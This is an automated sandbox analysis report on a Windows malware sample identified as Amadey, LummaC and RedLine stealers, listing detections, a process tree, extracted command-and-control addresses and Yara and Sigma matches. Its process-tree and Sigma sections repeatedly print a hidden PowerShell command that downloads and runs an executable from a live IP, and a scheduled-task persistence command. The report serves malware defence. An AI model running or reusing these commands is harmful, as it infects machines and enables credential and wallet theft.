Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
random.exe

Overview

General Information

Sample name:random.exe
Analysis ID:1604695
MD5:32832a5b7cdb038a2a06a5563ca4a276
SHA1:5d2381c95ca21400ef3439803cc3553a70f59c44
SHA256:efe0ec69b3a6c1cab02aef97507824b0dcd3218c12cc436117a167e49b8c59aa
Tags:exeuser-aachum
Infos:

Detection

Amadey, LummaC Stealer, RedLine
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Antivirus detection for dropped file
Detected unpacking (changes PE section rights)
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Powershell download and execute file
Suricata IDS alerts for network traffic
Yara detected Amadey
Yara detected Amadeys stealer DLL
Yara detected LummaC Stealer
Yara detected Powershell download and execute
Yara detected RedLine Stealer
Yara detected obfuscated html page
Binary is likely a compiled AutoIt script file
C2 URLs / IPs found in malware configuration
Creates HTA files
Found API chain indicative of sandbox detection
Found evasive API chain (may stop execution after reading information in the PEB, e.g. number of processors)
Found many strings related to Crypto-Wallets (likely being stolen)
Hides threads from debuggers
Joe Sandbox ML detected suspicious sample
Machine Learning detection for dropped file
Machine Learning detection for sample
PE file contains section with special chars
Powershell drops PE file
Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines)
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Query firmware table information (likely to detect VMs)
Sample uses string decryption to hide its real strings
Sigma detected: Invoke-Obfuscation CLIP+ Launcher
Sigma detected: Invoke-Obfuscation VAR+ Launcher
Sigma detected: New RUN Key Pointing to Suspicious Folder
Sigma detected: PowerShell DownloadFile
Sigma detected: Script Interpreter Execution From Suspicious Folder
Sigma detected: Suspicious MSHTA Child Process
Sigma detected: Suspicious Script Execution From Temp Folder
Suspicious powershell command line found
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Tries to detect sandboxes and other dynamic analysis tools (window names)
Tries to detect virtualization through RDTSC time measurements
Tries to download and execute files (via powershell)
Tries to evade debugger and weak emulator (self modifying code)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Crypto Currency Wallets
Uses known network protocols on non-standard ports
Uses schtasks.exe or at.exe to add and modify task schedules
AV process strings found (often used to terminate AV products)
Abnormal high CPU Usage
Allocates memory with a write watch (potentially for evading sandboxes)
Binary contains a suspicious time stamp
Checks for debuggers (devices)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality for execution timing, often used to detect debuggers
Contains functionality for read data from the clipboard
Contains functionality to block mouse and keyboard input (often used to hinder debugging)
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to execute programs as a different user
Contains functionality to launch a process as a different user
Contains functionality to launch a program with higher privileges
Contains functionality to modify clipboard data
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate keystroke presses
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Creates job files (autostart)
Detected TCP or UDP traffic on non-standard ports
Detected non-DNS traffic on DNS port
Detected potential crypto function
Downloads executable code via HTTP
Dropped file seen in connection with other malware
Drops PE files
Enables debug privileges
Entry point lies outside standard sections
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
OS version to string mapping found (often used in BOTs)
PE file contains an invalid checksum
PE file contains sections with non-standard names
PE file overlay found
Potential key logger detected (key state polling based)
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Searches for the Microsoft Outlook file path
Searches for user specific document files
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: Potential Binary Or Script Dropper Via PowerShell
Sigma detected: PowerShell Download Pattern
Sigma detected: PowerShell Web Download
Sigma detected: Suspicious Schtasks From Env Var Folder
Sigma detected: Usage Of Web Request Commands And Cmdlets
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses insecure TLS / SSL version for HTTPS connection
Yara detected Credential Stealer
Yara signature match

Classification

Process Tree

  • System is w10x64
  • random.exe (PID: 1036 cmdline: "C:\Users\user\Desktop\random.exe" MD5: 32832A5B7CDB038A2A06A5563CA4A276)
    • cmd.exe (PID: 3776 cmdline: C:\Windows\system32\cmd.exe /c schtasks /create /tn PzPPLma0H6r /tr "mshta C:\Users\user\AppData\Local\Temp\huS4b5Vj8.hta" /sc minute /mo 25 /ru "user" /f MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • conhost.exe (PID: 2784 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • schtasks.exe (PID: 3476 cmdline: schtasks /create /tn PzPPLma0H6r /tr "mshta C:\Users\user\AppData\Local\Temp\huS4b5Vj8.hta" /sc minute /mo 25 /ru "user" /f MD5: 48C2FE20575769DE916F48EF0676A965)
    • mshta.exe (PID: 5160 cmdline: mshta C:\Users\user\AppData\Local\Temp\huS4b5Vj8.hta MD5: 06B02D5C097C7DB1F109749C45F3F505)
      • powershell.exe (PID: 7132 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'8WMDJ3BJ1HEGEWEDLFTLEWRVXCIZEQKZ.EXE';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/mine/random.exe',$d);Start-Process $d; MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
        • conhost.exe (PID: 2448 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • Temp8WMDJ3BJ1HEGEWEDLFTLEWRVXCIZEQKZ.EXE (PID: 4236 cmdline: "C:\Users\user\AppData\Local\Temp8WMDJ3BJ1HEGEWEDLFTLEWRVXCIZEQKZ.EXE" MD5: 5D13EA58C9BD61E51034782C4A5F39FE)
          • skotes.exe (PID: 5908 cmdline: "C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe" MD5: 5D13EA58C9BD61E51034782C4A5F39FE)
  • mshta.exe (PID: 5644 cmdline: C:\Windows\system32\mshta.EXE C:\Users\user\AppData\Local\Temp\huS4b5Vj8.hta MD5: 0B4340ED812DC82CE636C00FA5C9BEF2)
    • powershell.exe (PID: 3544 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'8WMDJ3BJ1HEGEWEDLFTLEWRVXCIZEQKZ.EXE';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/mine/random.exe',$d);Start-Process $d; MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 4188 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • skotes.exe (PID: 6428 cmdline: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe MD5: 5D13EA58C9BD61E51034782C4A5F39FE)
  • skotes.exe (PID: 1220 cmdline: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe MD5: 5D13EA58C9BD61E51034782C4A5F39FE)
    • 28f48f066a.exe (PID: 3640 cmdline: "C:\Users\user\AppData\Local\Temp\1062369001\28f48f066a.exe" MD5: A1933643136191A754B1A4BB791D2DC5)
    • 8c36d696e4.exe (PID: 1216 cmdline: "C:\Users\user\AppData\Local\Temp\1062370001\8c36d696e4.exe" MD5: F662CB18E04CC62863751B672570BD7D)
      • conhost.exe (PID: 1828 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • 0dd40f41c4.exe (PID: 3468 cmdline: "C:\Users\user\AppData\Local\Temp\1062371001\0dd40f41c4.exe" MD5: 28EB15252AEA9690429C884AF46857F9)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
AmadeyAmadey is a botnet that appeared around October 2018 and is being sold for about $500 on Russian-speaking hacking forums. It periodically sends information about the system and installed AV software to its C2 server and polls to receive orders from it. Its main functionality is that it can load other payloads (called "tasks") for all or specifically targeted computers compromised by the malware.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.amadey
NameDescriptionAttributionBlogpost URLsLink
RedLine StealerRedLine Stealer is a malware available on underground forums for sale apparently as a standalone ($100/$150 depending on the version) or also on a subscription basis ($100/month). This malware harvests information from browsers such as saved credentials, autocomplete data, and credit card information. A system inventory is also taken when running on a target machine, to include details such as the username, location data, hardware configuration, and information regarding installed security software. More recent versions of RedLine added the ability to steal cryptocurrency. FTP and IM clients are also apparently targeted by this family, and this malware has the ability to upload and download files, execute commands, and periodically send back information about the infected computer.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.redline_stealer

Malware Configuration

Threatname: LummaC

{"C2 url": "https://rampnatleadk.click/api", "Build Version": "fBkCmu--labinstall"}

Threatname: Amadey

{"C2 url": "185.215.113.43/Zu7JuNko/index.php", "Version": "4.42", "Install Folder": "abc3bc1985", "Install File": "skotes.exe"}

Threatname: RedLine

{"C2 url": ["103.84.89.222:33791"], "Bot Id": "cheat"}

Yara Signatures

PCAP (Network Traffic)

SourceRuleDescriptionAuthorStrings
dump.pcapJoeSecurity_RedLine_1Yara detected RedLine StealerJoe Security
    dump.pcapJoeSecurity_RedLineYara detected RedLine StealerJoe Security
      sslproxydump.pcapJoeSecurity_LummaCStealer_3Yara detected LummaC StealerJoe Security
        sslproxydump.pcapJoeSecurity_LummaCStealer_2Yara detected LummaC StealerJoe Security

          Dropped Files

          SourceRuleDescriptionAuthorStrings
          C:\Users\user\AppData\Local\Temp\huS4b5Vj8.htaJoeSecurity_ObshtmlYara detected obfuscated html pageJoe Security

            Memory Dumps

            SourceRuleDescriptionAuthorStrings
            0000000D.00000002.2266795268.0000000000301000.00000040.00000001.01000000.0000000F.sdmpJoeSecurity_Amadey_2Yara detected Amadey\'s stealer DLLJoe Security
              0000000C.00000003.2235414264.00000000046C0000.00000004.00001000.00020000.00000000.sdmpJoeSecurity_Amadey_2Yara detected Amadey\'s stealer DLLJoe Security
                00000015.00000002.4319695523.0000000000B12000.00000040.00000001.01000000.00000012.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
                  00000015.00000002.4319695523.0000000000B12000.00000040.00000001.01000000.00000012.sdmpJoeSecurity_RedLineYara detected RedLine StealerJoe Security
                    00000015.00000002.4319695523.0000000000B12000.00000040.00000001.01000000.00000012.sdmpWindows_Trojan_RedLineStealer_f54632ebunknownunknown
                    • 0x133ca:$a4: get_ScannedWallets
                    • 0x12228:$a5: get_ScanTelegram
                    • 0x1304e:$a6: get_ScanGeckoBrowsersPaths
                    • 0x10e6a:$a7: <Processes>k__BackingField
                    • 0xed7c:$a8: <GetWindowsVersion>g__HKLM_GetString|11_0
                    • 0x1079e:$a9: <ScanFTP>k__BackingField
                    Click to see the 26 entries

                    Unpacked PEs

                    SourceRuleDescriptionAuthorStrings
                    21.2.8c36d696e4.exe.b10000.0.unpackJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
                      21.2.8c36d696e4.exe.b10000.0.unpackJoeSecurity_RedLineYara detected RedLine StealerJoe Security
                        21.2.8c36d696e4.exe.b10000.0.unpackWindows_Trojan_RedLineStealer_f54632ebunknownunknown
                        • 0x137ca:$a4: get_ScannedWallets
                        • 0x12628:$a5: get_ScanTelegram
                        • 0x1344e:$a6: get_ScanGeckoBrowsersPaths
                        • 0x1126a:$a7: <Processes>k__BackingField
                        • 0xf17c:$a8: <GetWindowsVersion>g__HKLM_GetString|11_0
                        • 0x10b9e:$a9: <ScanFTP>k__BackingField
                        21.2.8c36d696e4.exe.b10000.0.unpackinfostealer_win_redline_stringsFinds Redline samples based on characteristic stringsSekoia.io
                        • 0x11bcb:$gen01: ChromeGetRoamingName
                        • 0x11bff:$gen02: ChromeGetLocalName
                        • 0x11c28:$gen03: get_UserDomainName
                        • 0x13e67:$gen04: get_encrypted_key
                        • 0x133e3:$gen05: browserPaths
                        • 0x1372b:$gen06: GetBrowsers
                        • 0x13061:$gen07: get_InstalledInputLanguages
                        • 0x1084f:$gen08: BCRYPT_INIT_AUTH_MODE_INFO_VERSION
                        • 0x8938:$spe1: [AString-ZaString-z\d]{2String4}\.[String\w-]{String6}\.[\wString-]{2String7}
                        • 0x9318:$spe6: windows-1251, CommandLine:
                        • 0x145bd:$spe9: *wallet*
                        • 0xf00c:$typ01: 359A00EF6C789FD4C18644F56C5D3F97453FFF20
                        • 0xf107:$typ02: F413CEA9BAA458730567FE47F57CC3C94DDF63C0
                        • 0xf464:$typ03: A937C899247696B6565665BE3BD09607F49A2042
                        • 0xf571:$typ04: D67333042BFFC20116BF01BC556566EC76C6F7E2
                        • 0xf6f0:$typ05: 4E3D7F188A5F5102BEC5B820632BBAEC26839E63
                        • 0xf098:$typ07: 77A9683FAF2EC9EC3DABC09D33C3BD04E8897D60
                        • 0xf0c1:$typ08: A8F9B62160DF085B926D5ED70E2B0F6C95A25280
                        • 0xf25f:$typ10: 2FBDC611D3D91C142C969071EA8A7D3D10FF6301
                        • 0xf59a:$typ12: EB7EF1973CDC295B7B08FE6D82B9ECDAD1106AF2
                        • 0xf639:$typ13: 04EC68A0FC7D9B6A255684F330C28A4DCAB91F13
                        21.2.8c36d696e4.exe.b10000.0.unpackMALWARE_Win_RedLineDetects RedLine infostealerditekSHen
                        • 0x1068a:$u7: RunPE
                        • 0x13d41:$u8: DownloadAndEx
                        • 0x9330:$pat14: , CommandLine:
                        • 0x13279:$v2_1: ListOfProcesses
                        • 0x1088b:$v2_2: get_ScanVPN
                        • 0x1092e:$v2_2: get_ScanFTP
                        • 0x1161e:$v2_2: get_ScanDiscord
                        • 0x1260c:$v2_2: get_ScanSteam
                        • 0x12628:$v2_2: get_ScanTelegram
                        • 0x126ce:$v2_2: get_ScanScreen
                        • 0x13416:$v2_2: get_ScanChromeBrowsersPaths
                        • 0x1344e:$v2_2: get_ScanGeckoBrowsersPaths
                        • 0x13709:$v2_2: get_ScanBrowsers
                        • 0x137ca:$v2_2: get_ScannedWallets
                        • 0x137f0:$v2_2: get_ScanWallets
                        • 0x13810:$v2_3: GetArguments
                        • 0x11ed9:$v2_4: VerifyUpdate
                        • 0x167ea:$v2_4: VerifyUpdate
                        • 0x13bca:$v2_5: VerifyScanRequest
                        • 0x132c6:$v2_6: GetUpdates
                        • 0x167cb:$v2_6: GetUpdates
                        Click to see the 5 entries

                        Other

                        SourceRuleDescriptionAuthorStrings
                        amsi32_7132.amsi.csvJoeSecurity_PowershellDownloadAndExecuteYara detected Powershell download and executeJoe Security
                          amsi64_3544.amsi.csvJoeSecurity_PowershellDownloadAndExecuteYara detected Powershell download and executeJoe Security

                            Sigma Signatures

                            System Summary

                            barindex
                            Sigma detected: Invoke-Obfuscation CLIP+ Launcher
                            Source: Process startedAuthor: Jonathan Cheong, oscd.community: Data: Command: C:\Windows\system32\cmd.exe /c schtasks /create /tn PzPPLma0H6r /tr "mshta C:\Users\user\AppData\Local\Temp\huS4b5Vj8.hta" /sc minute /mo 25 /ru "user" /f, CommandLine: C:\Windows\system32\cmd.exe /c schtasks /create /tn PzPPLma0H6r /tr "mshta C:\Users\user\AppData\Local\Temp\huS4b5Vj8.hta" /sc minute /mo 25 /ru "user" /f, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: "C:\Users\user\Desktop\random.exe", ParentImage: C:\Users\user\Desktop\random.exe, ParentProcessId: 1036, ParentProcessName: random.exe, ProcessCommandLine: C:\Windows\system32\cmd.exe /c schtasks /create /tn PzPPLma0H6r /tr "mshta C:\Users\user\AppData\Local\Temp\huS4b5Vj8.hta" /sc minute /mo 25 /ru "user" /f, ProcessId: 3776, ProcessName: cmd.exe
                            Sigma detected: Invoke-Obfuscation VAR+ Launcher
                            Source: Process startedAuthor: Jonathan Cheong, oscd.community: Data: Command: C:\Windows\system32\cmd.exe /c schtasks /create /tn PzPPLma0H6r /tr "mshta C:\Users\user\AppData\Local\Temp\huS4b5Vj8.hta" /sc minute /mo 25 /ru "user" /f, CommandLine: C:\Windows\system32\cmd.exe /c schtasks /create /tn PzPPLma0H6r /tr "mshta C:\Users\user\AppData\Local\Temp\huS4b5Vj8.hta" /sc minute /mo 25 /ru "user" /f, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: "C:\Users\user\Desktop\random.exe", ParentImage: C:\Users\user\Desktop\random.exe, ParentProcessId: 1036, ParentProcessName: random.exe, ProcessCommandLine: C:\Windows\system32\cmd.exe /c schtasks /create /tn PzPPLma0H6r /tr "mshta C:\Users\user\AppData\Local\Temp\huS4b5Vj8.hta" /sc minute /mo 25 /ru "user" /f, ProcessId: 3776, ProcessName: cmd.exe
                            Sigma detected: New RUN Key Pointing to Suspicious Folder
                            Source: Registry Key setAuthor: Florian Roth (Nextron Systems), Markus Neis, Sander Wiebing: Data: Details: C:\Users\user\AppData\Local\Temp\1062371001\0dd40f41c4.exe, EventID: 13, EventType: SetValue, Image: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe, ProcessId: 1220, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\0dd40f41c4.exe
                            Sigma detected: PowerShell DownloadFile
                            Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'8WMDJ3BJ1HEGEWEDLFTLEWRVXCIZEQKZ.EXE';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/mine/random.exe',$d);Start-Process $d;, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'8WMDJ3BJ1HEGEWEDLFTLEWRVXCIZEQKZ.EXE';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/mine/random.exe',$d);Start-Process $d;, CommandLine|base64offset|contains: hv)^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: mshta C:\Users\user\AppData\Local\Temp\huS4b5Vj8.hta, ParentImage: C:\Windows\SysWOW64\mshta.exe, ParentProcessId: 5160, ParentProcessName: mshta.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'8WMDJ3BJ1HEGEWEDLFTLEWRVXCIZEQKZ.EXE';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/mine/random.exe',$d);Start-Process $d;, ProcessId: 7132, ProcessName: powershell.exe
                            Sigma detected: Script Interpreter Execution From Suspicious Folder
                            Source: Process startedAuthor: Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems): Data: Command: mshta C:\Users\user\AppData\Local\Temp\huS4b5Vj8.hta, CommandLine: mshta C:\Users\user\AppData\Local\Temp\huS4b5Vj8.hta, CommandLine|base64offset|contains: m, Image: C:\Windows\SysWOW64\mshta.exe, NewProcessName: C:\Windows\SysWOW64\mshta.exe, OriginalFileName: C:\Windows\SysWOW64\mshta.exe, ParentCommandLine: "C:\Users\user\Desktop\random.exe", ParentImage: C:\Users\user\Desktop\random.exe, ParentProcessId: 1036, ParentProcessName: random.exe, ProcessCommandLine: mshta C:\Users\user\AppData\Local\Temp\huS4b5Vj8.hta, ProcessId: 5160, ProcessName: mshta.exe
                            Sigma detected: Suspicious MSHTA Child Process
                            Source: Process startedAuthor: Michael Haag: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'8WMDJ3BJ1HEGEWEDLFTLEWRVXCIZEQKZ.EXE';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/mine/random.exe',$d);Start-Process $d;, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'8WMDJ3BJ1HEGEWEDLFTLEWRVXCIZEQKZ.EXE';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/mine/random.exe',$d);Start-Process $d;, CommandLine|base64offset|contains: hv)^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: mshta C:\Users\user\AppData\Local\Temp\huS4b5Vj8.hta, ParentImage: C:\Windows\SysWOW64\mshta.exe, ParentProcessId: 5160, ParentProcessName: mshta.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'8WMDJ3BJ1HEGEWEDLFTLEWRVXCIZEQKZ.EXE';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/mine/random.exe',$d);Start-Process $d;, ProcessId: 7132, ProcessName: powershell.exe
                            Sigma detected: Suspicious Script Execution From Temp Folder
                            Source: Process startedAuthor: Florian Roth (Nextron Systems), Max Altgelt (Nextron Systems), Tim Shelton: Data: Command: mshta C:\Users\user\AppData\Local\Temp\huS4b5Vj8.hta, CommandLine: mshta C:\Users\user\AppData\Local\Temp\huS4b5Vj8.hta, CommandLine|base64offset|contains: m, Image: C:\Windows\SysWOW64\mshta.exe, NewProcessName: C:\Windows\SysWOW64\mshta.exe, OriginalFileName: C:\Windows\SysWOW64\mshta.exe, ParentCommandLine: "C:\Users\user\Desktop\random.exe", ParentImage: C:\Users\user\Desktop\random.exe, ParentProcessId: 1036, ParentProcessName: random.exe, ProcessCommandLine: mshta C:\Users\user\AppData\Local\Temp\huS4b5Vj8.hta, ProcessId: 5160, ProcessName: mshta.exe
                            Sigma detected: CurrentVersion Autorun Keys Modification
                            Source: Registry Key setAuthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: C:\Users\user\AppData\Local\Temp\1062371001\0dd40f41c4.exe, EventID: 13, EventType: SetValue, Image: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe, ProcessId: 1220, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\0dd40f41c4.exe
                            Sigma detected: Potential Binary Or Script Dropper Via PowerShell
                            Source: File createdAuthor: frack113, Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 7132, TargetFilename: C:\Users\user\AppData\Local\Temp8WMDJ3BJ1HEGEWEDLFTLEWRVXCIZEQKZ.EXE
                            Sigma detected: PowerShell Download Pattern
                            Source: Process startedAuthor: Florian Roth (Nextron Systems), oscd.community, Jonhnathan Ribeiro: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'8WMDJ3BJ1HEGEWEDLFTLEWRVXCIZEQKZ.EXE';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/mine/random.exe',$d);Start-Process $d;, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'8WMDJ3BJ1HEGEWEDLFTLEWRVXCIZEQKZ.EXE';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/mine/random.exe',$d);Start-Process $d;, CommandLine|base64offset|contains: hv)^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: mshta C:\Users\user\AppData\Local\Temp\huS4b5Vj8.hta, ParentImage: C:\Windows\SysWOW64\mshta.exe, ParentProcessId: 5160, ParentProcessName: mshta.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'8WMDJ3BJ1HEGEWEDLFTLEWRVXCIZEQKZ.EXE';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/mine/random.exe',$d);Start-Process $d;, ProcessId: 7132, ProcessName: powershell.exe
                            Sigma detected: PowerShell Web Download
                            Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'8WMDJ3BJ1HEGEWEDLFTLEWRVXCIZEQKZ.EXE';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/mine/random.exe',$d);Start-Process $d;, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'8WMDJ3BJ1HEGEWEDLFTLEWRVXCIZEQKZ.EXE';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/mine/random.exe',$d);Start-Process $d;, CommandLine|base64offset|contains: hv)^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: mshta C:\Users\user\AppData\Local\Temp\huS4b5Vj8.hta, ParentImage: C:\Windows\SysWOW64\mshta.exe, ParentProcessId: 5160, ParentProcessName: mshta.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'8WMDJ3BJ1HEGEWEDLFTLEWRVXCIZEQKZ.EXE';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/mine/random.exe',$d);Start-Process $d;, ProcessId: 7132, ProcessName: powershell.exe
                            Sigma detected: Suspicious Schtasks From Env Var Folder
                            Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: schtasks /create /tn PzPPLma0H6r /tr "mshta C:\Users\user\AppData\Local\Temp\huS4b5Vj8.hta" /sc minute /mo 25 /ru "user" /f, CommandLine: schtasks /create /tn PzPPLma0H6r /tr "mshta C:\Users\user\AppData\Local\Temp\huS4b5Vj8.hta" /sc minute /mo 25 /ru "user" /f, CommandLine|base64offset|contains: mj,, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /c schtasks /create /tn PzPPLma0H6r /tr "mshta C:\Users\user\AppData\Local\Temp\huS4b5Vj8.hta" /sc minute /mo 25 /ru "user" /f, ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 3776, ParentProcessName: cmd.exe, ProcessCommandLine: schtasks /create /tn PzPPLma0H6r /tr "mshta C:\Users\user\AppData\Local\Temp\huS4b5Vj8.hta" /sc minute /mo 25 /ru "user" /f, ProcessId: 3476, ProcessName: schtasks.exe
                            Sigma detected: Usage Of Web Request Commands And Cmdlets
                            Source: Process startedAuthor: James Pemberton / @4A616D6573, Endgame, JHasenbusch, oscd.community, Austin Songer @austinsonger: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'8WMDJ3BJ1HEGEWEDLFTLEWRVXCIZEQKZ.EXE';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/mine/random.exe',$d);Start-Process $d;, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'8WMDJ3BJ1HEGEWEDLFTLEWRVXCIZEQKZ.EXE';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/mine/random.exe',$d);Start-Process $d;, CommandLine|base64offset|contains: hv)^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: mshta C:\Users\user\AppData\Local\Temp\huS4b5Vj8.hta, ParentImage: 